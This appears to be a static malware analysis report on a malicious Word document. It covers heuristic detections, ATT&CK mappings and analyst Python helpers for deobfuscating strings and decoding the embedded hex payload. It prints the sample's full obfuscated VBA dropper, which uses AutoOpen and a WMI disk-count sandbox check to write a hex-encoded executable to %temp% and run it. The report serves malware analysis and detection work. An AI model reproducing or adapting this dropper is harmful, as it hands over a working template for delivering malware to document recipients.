Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d1c9b0fdf585824b…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 574.0 KB
Created: 2014-07-16 07:28:00
Authoring application: Microsoft Office Word
First seen: 2018-06-19
MD5: 600f753b852140339b50e5f8fe8821cb
SHA-1: ec180101dd0f34b8fd28ac9ec898bb5f011a4726
SHA-256: d1c9b0fdf585824b3d4cea94e23fdec46d54b64f475bd79189eff1353bd087cf
Risk Score: 390

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
T1071.001 Application Layer Protocol: Web Protocols (tool-assigned; the recovered macro source contains no URL or network call)

The sample is a malicious Word document whose VBA project has three modules: the Document module (holding AutoOpen), a standard module named catalonia, and a UserForm named Bullet. AutoOpen calls catalonia.nelumbonaceae, which assembles the WMI query "Select * from Win32_DiskDrive" from Left/Right/Mid fragments, runs it through GetObject("winmgmts:\\.\root\cimv2"), and returns the number of disk drives. The benign InsertLandscapeSectionHere routine runs only if that count equals 43122 (115 + 83 + 42924), so on any real host the Else branch calls catalonia.chimera. chimera creates WScript.Shell, resolves %temp% with ExpandEnvironmentStrings (the method name is built with StrReverse and invoked through CallByName), takes the hex string stored in Bullet.Proof on the UserForm, decodes it two characters at a time with CByte("&H" & pair) into %temp%\delictum.exe, and starts that file with WScript.Shell.Run. The payload is therefore embedded in the document rather than downloaded: the recovered source contains no URL or network call, the only URLs in the file are image-metadata namespace identifiers, and the behaviour matches the ClamAV name Doc.Dropper.HexEncodedEXEHeader. The hex blob itself is not in the extracted code module; it is a UserForm control value and has to be recovered from the form's storage streams (olevba can list such values as VBA form strings). The document body carries an enable-content lure, and the arithmetic and string-building loops scattered through the modules are padding with no effect on behaviour.

Heuristics (12)

  • ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.HexEncodedEXEHeader-9789587-1
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set maharani = VBA.CreateObject("WScript.Shell")
    coerebidae = StrReverse("EdnapxE") + "nvironmentStrings"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set maharani = VBA.CreateObject("WScript.Shell")
    coerebidae = StrReverse("EdnapxE") + "nvironmentStrings"
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    enach = "Dis" + "kDriv" + "e"
    Set ratchet = GetObject("winmgmts:\\" & ".\root\cimv2")
    amaranthine = 39 - 26
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    coerebidae = StrReverse("EdnapxE") + "nvironmentStrings"
    musophobia = CallByName(maharani, coerebidae, VbMethod, "%temp%")
    Dim strigidae As Long
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Public Sub AutoOpen()
    Dim quo As Object
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
    Note: for this sample a VBA project was in fact recovered (see the extracted macros.bas), so the marker is the same AutoOpen already reported under OLE_VBA_AUTOOPEN rather than independent evidence.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All of the URLs below are XMP/RDF namespace identifiers (ns.adobe.com, w3.org, purl.org) or the IEC site named in standard sRGB ICC profile text; they come from image metadata embedded in the document body, not from the macro, and none is a download or command-and-control location.
    • http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/ In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/ In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/rights/ In document text (OLE body)
    • http://www.iec.ch In document text (OLE body)
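
The matched lines above build every sensitive string from Left/Right/Mid/StrReverse/Chr fragments and small integer sums. The script below is an added analyst aid, not code from the report or from the sample: a small evaluator for exactly that literal-only subset of VBA (string literals with VBA's doubled-quote escaping and no backslash escapes, integers, the + - & operators, and the Left, Right, Mid, StrReverse and Chr functions with VBA's 1-based Mid). The sample expressions are copied from the recovered source; the variable names used as keys are the macro's own, and the assembled query is the one nelumbonaceae passes to ExecQuery.

```python
"""Evaluate the literal-only VBA expressions the macro uses to hide its strings.
Any identifier other than the listed functions raises, so a variable assigned
elsewhere is never silently guessed."""
import re

_TOKEN = re.compile(r'\s*(?:("(?:[^"]|"")*")|(\d+)|([A-Za-z_]\w*)|([-+&(),]))')

# VBA builtins used by the sample; Left/Right/Mid are 1-based and clamp silently.
FUNCS = {
    "left": lambda s, n: s[:n],
    "right": lambda s, n: s[len(s) - n:] if n > 0 else "",
    "mid": lambda s, start, length=None: s[start - 1:][:length],
    "strreverse": lambda s: s[::-1],
    "chr": chr,
}


def tokenize(src):
    """Split a VBA expression into (kind, value) tokens; strings keep backslashes literally."""
    tokens, pos, src = [], 0, src.rstrip()
    while pos < len(src):
        m = _TOKEN.match(src, pos)
        if not m:
            raise ValueError(f"unexpected input at offset {pos}: {src[pos:pos + 12]!r}")
        pos = m.end()
        text, num, ident, op = m.groups()
        if text is not None:
            tokens.append(("str", text[1:-1].replace('""', '"')))
        elif num is not None:
            tokens.append(("num", int(num)))
        elif ident is not None:
            tokens.append(("ident", ident.lower()))
        else:
            tokens.append(("op", op))
    return tokens


def _parse(toks):
    """expr := factor (('+' | '-' | '&') factor)*; factor := literal | func '(' expr {',' expr} ')'."""
    i = 0

    def peek(kind, value=None):
        return i < len(toks) and toks[i][0] == kind and (value is None or toks[i][1] == value)

    def take():
        nonlocal i
        i += 1
        return toks[i - 1][1]

    def factor():
        if peek("str") or peek("num"):
            return take()
        if not peek("ident"):
            raise ValueError(f"unexpected token at {i}")
        name = take()
        if name not in FUNCS:
            raise ValueError(f"unknown identifier {name!r}: a variable assigned elsewhere?")
        if not peek("op", "("):
            raise ValueError(f"expected '(' after {name}")
        take()
        args = [expr()]
        while peek("op", ","):
            take()
            args.append(expr())
        if not peek("op", ")"):
            raise ValueError("expected ')'")
        take()
        return FUNCS[name](*args)

    def expr():
        val = factor()
        while peek("op", "+") or peek("op", "-") or peek("op", "&"):
            op, rhs = take(), factor()
            if op == "&":              # & always concatenates as text
                val = str(val) + str(rhs)
            else:                      # + joins strings or adds numbers, as in VBA
                val = val + rhs if op == "+" else val - rhs
        return val

    val = expr()
    if i != len(toks):
        raise ValueError("trailing tokens")
    return val


def vba_eval(expression):
    """Evaluate one literal-only VBA expression and return a str or int."""
    return _parse(tokenize(expression))


# Right-hand sides copied from the recovered source, keyed by the macro's variable names.
SAMPLE_EXPRESSIONS = {
    "appingit": 'Right("adaxialSe", 2) + Left("lectapheresis", 4)',
    "hyalinization": 'Left(" * fhabitation", 4) + "rom Win" + Mid("draff32_hypothesis", 6, 3)',
    "enach": '"Dis" + "kDriv" + "e"',
    "coerebidae": 'StrReverse("EdnapxE") + "nvironmentStrings"',
    "hex_prefix": '"&" + Chr(6 + 73 - 7)',
    "wmi_path": r'"winmgmts:\\" & ".\root\cimv2"',
    "guard_value": "115 + 83 + 42924",
}


def resolve_samples():
    """Resolve every sample and assemble the WMI query nelumbonaceae executes."""
    out = {name: vba_eval(src) for name, src in SAMPLE_EXPRESSIONS.items()}
    out["wmi_query"] = out["appingit"] + out["hyalinization"] + out["enach"]
    return out


if __name__ == "__main__":
    for name, value in resolve_samples().items():
        print(f"{name:>13} = {value!r}")
```

Run it as-is to print each resolved value, or pass any other right-hand side from the source to vba_eval(). It deliberately contains no eval() and no variable lookup: an expression that depends on a name assigned somewhere else raises instead of producing a plausible but wrong string, which is the failure mode to avoid when the resolved value is going into a detection rule.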

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5026 bytes
SHA-256: a24f5a6114a6d9139b185dc5bfdb87d17c5b37ed66c6ee194598e285494fa098
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Document"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub InsertLandscapeSectionHere()
' Purpose: Insert a landscape section at the insertion point,
' and insert text to tell the user where the landscape section is.
    If Documents.Count > 0 Then
        ' The user has a document open, so insert a
        ' landscape section.
        With Selection
            ' Do not accidentally over-write selected text
            .Collapse Direction:=wdCollapseStart

            ' Insert section breaks with blank paragraphs
            ' in the new section.
            .TypeParagraph
            .Style = ActiveDocument.Styles(wdStyleNormal)
            .InsertBreak Type:=wdSectionBreakNextPage
            .TypeParagraph
            .TypeParagraph
            .TypeParagraph
            .InsertBreak Type:=wdSectionBreakNextPage
            .MoveUp Unit:=wdLine, Count:=3

            ' Set the orientation of new section to landscape.
            .PageSetup.Orientation = wdOrientLandscape

            ' Provide guidance to the user.
            .TypeText Text:="Your landscape section starts here."
        End With
    Else
        ' Tell the user what to do.
        MsgBox "Please open a document and try again."
    End If
End Sub

Public Sub AutoOpen()
Dim quo As Object
Dim adjusted As Integer
Dim unvoiced As String
adjusted = catalonia.nelumbonaceae
If adjusted = 115 + 83 + 42924 Then
InsertLandscapeSectionHere
Else
dutiful = 57 - 73 + 106
enterobacteriaceae = 27 + 36
If dutiful + enterobacteriaceae > 68 Then
bicentric = "io" + StrReverse("u") + Left("beagle", 0)
End If

catalonia.chimera
End If
End Sub


Attribute VB_Name = "catalonia"
Sub chimera()
Dim uninteresting As String
silvervine = "amino"
Dim musophobia As String
Dim enraptures As Variant
Dim excogitation As String
alkaloidal = 97 - 63
merestone = 128 - 74
For alkaloidal = 97 - 63 To 128 - 74
faker = Mid("kitesotclogging", 6, 2) + "is" + "" + ""
Next alkaloidal

Set maharani = VBA.CreateObject("WScript.Shell")
coerebidae = StrReverse("EdnapxE") + "nvironmentStrings"
musophobia = CallByName(maharani, coerebidae, VbMethod, "%temp%")
Dim strigidae As Long
excogitation = musophobia & "\delictum.exe"

Dim agains As Integer
Dim invaluableness
Dim organizational
organizational = FreeFile
Dim halfholiday
halfholiday = 0
Dim coherent
Dim chevalier As Variant
invaluableness = halfholiday

cacoepy = Bullet.Proof

Dim apaulette As Object
ameiuridae = cacoepy
necromancer = Len(ameiuridae)
invaluableness = 1
Dim monospermous As String
Open excogitation For Binary Access Write As #organizational
Dim bureaucratic As Byte

carouse = 31 - 118 + 126
halicoeres = 70 + 38 - 54
For carouse = 31 - 118 + 126 To 70 + 38 - 54
chamaecytisus = "un" + "wholesomeness"
Next carouse

disembroil = 124 + 98 - 220
For overpriced = invaluableness To (necromancer / disembroil)
Call catalonia.unhygienically(organizational, ameiuridae, invaluableness)
invaluableness = invaluableness + 2
Next overpriced
california = 119 - 45 - 28
coloration = 75 - 23
For california = 119 - 45 - 28 To 75 - 23
mender = "eu" + "geni" + "a" + Mid("anywhereaground(p)", 9, 0)
Next california

Close #organizational
musophobia = CallByName(maharani, "Run", VbMethod, excogitation)
End Sub

Public Sub unhygienically(ByRef bruised, apprehensible, axially)
abeyance = VBA.Mid(apprehensible, axially, 2)
Put #bruised, , CByte("&" + Chr(6 + 73 - 7) & abeyance)
End Sub

Function nelumbonaceae()
Dim gorgonacea As Long
appingit = Right("adaxialSe", 2) + Left("lectapheresis", 4)
Dim atony As Integer
bureaucrat = 0
dementat = 15 + 24 + 42
advantageous = 15 + 51
If dementat + advantageous > 48 Then
capella = "fi" + "neloo" + Right("insultsking", 4)
End If
hyalinization = Left(" * fhabitation", 4) + "rom Win" + Mid("draff32_hypothesis", 6, 3)
Dim algeria As String
enach = "Dis" + "kDriv" + "e"
Set ratchet = GetObject("winmgmts:\\" & ".\root\cimv2")
amaranthine = 39 - 26
galley = 93 - 33
For amaranthine = 39 - 26 To 93 - 33
chytridiales = Left("suactinal", 2) + Mid("nintubminipaynes", 6, 5) + "ster" + ""
Next amaranthine
Set cynoglossidae = ratchet.ExecQuery(appingit & hyalinization & enach)
For Each echidnophaga In cynoglossidae
bureaucrat = bureaucrat + 69 - 6 - 62
Next
nelumbonaceae = bureaucrat
End Function


Attribute VB_Name = "Bullet"
Attribute VB_Base = "0{2683B9E9-184F-4D5E-9644-9AFE55D9647F}{9950C0A9-8DAD-44E4-8594-B97BF9CF1F52}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub UserForm_Initialize()

End Sub
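
catalonia.chimera and catalonia.unhygienically above are the whole dropper: the value of Bullet.Proof is a string of hex pairs, each pair is prefixed with "&H", converted with CByte and written with Put, and the resulting file is launched. The decoder below is an added reproduction of that loop for analysts, not code from the report or from the sample. It lets the control's contents, once pulled from the UserForm storage, be turned back into the dropped file and checked for a consistent MZ/PE header before anything is run. The hex blob it decodes is a constructed stand-in for a PE header, not the sample's real payload, and the sha256 it prints is of that stand-in.

```python
"""Reproduce catalonia.chimera's hex decode loop and sanity-check the output as a PE."""
import hashlib
import string
import struct


def decode_like_macro(hex_text):
    """Mirror chimera/unhygienically: Len/2 iterations, Mid(text, pos, 2) from pos = 1
    stepping by 2, each pair read as the VBA literal "&H" & pair and written with Put.
    A trailing odd character is dropped by the loop bound exactly as in the macro;
    a non-hex pair raises here, as CByte would error on the host."""
    out = bytearray()
    pos = 1                                          # VBA Mid is 1-based
    for _ in range(len(hex_text) // 2):              # For overpriced = 1 To necromancer / 2
        pair = hex_text[pos - 1:pos + 1]             # Mid(apprehensible, axially, 2)
        if len(pair) != 2 or any(c not in string.hexdigits for c in pair):
            raise ValueError(f"non-hex pair {pair!r} at position {pos}")
        out.append(int(pair, 16))                    # CByte("&H" & pair)
        pos += 2                                     # invaluableness = invaluableness + 2
    return bytes(out)


def pe_summary(blob):
    """Return (is_pe, e_lfanew, sha256hex). is_pe is True only when the MZ header's
    e_lfanew field (offset 0x3C) points at a PE\\0\\0 signature inside the blob."""
    sha = hashlib.sha256(blob).hexdigest()
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False, None, sha
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0", e_lfanew, sha


# Constructed stand-in for the Bullet.Proof control value: a minimal DOS header whose
# e_lfanew points at a PE signature, then padding. It is NOT the sample's real payload.
_FAKE_PE = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40) + b"PE\0\0" + b"\x00" * 20
SAMPLE_CONTROL_VALUE = _FAKE_PE.hex().upper()


def run_sample():
    """Decode the stand-in the way the macro would and summarise the result."""
    blob = decode_like_macro(SAMPLE_CONTROL_VALUE)
    return pe_summary(blob), blob


if __name__ == "__main__":
    (is_pe, e_lfanew, sha), blob = run_sample()
    print(f"{len(blob)} bytes decoded, PE={is_pe}, e_lfanew={e_lfanew:#x}, sha256={sha}")
```

Replace SAMPLE_CONTROL_VALUE with the real control string to recover delictum.exe for offline analysis; the loop bound and the 1-based stepping are kept identical to the macro so the output is byte-for-byte what the host would have written, and a failed MZ/PE check means the wrong stream or a damaged blob was fed in rather than a decoder bug.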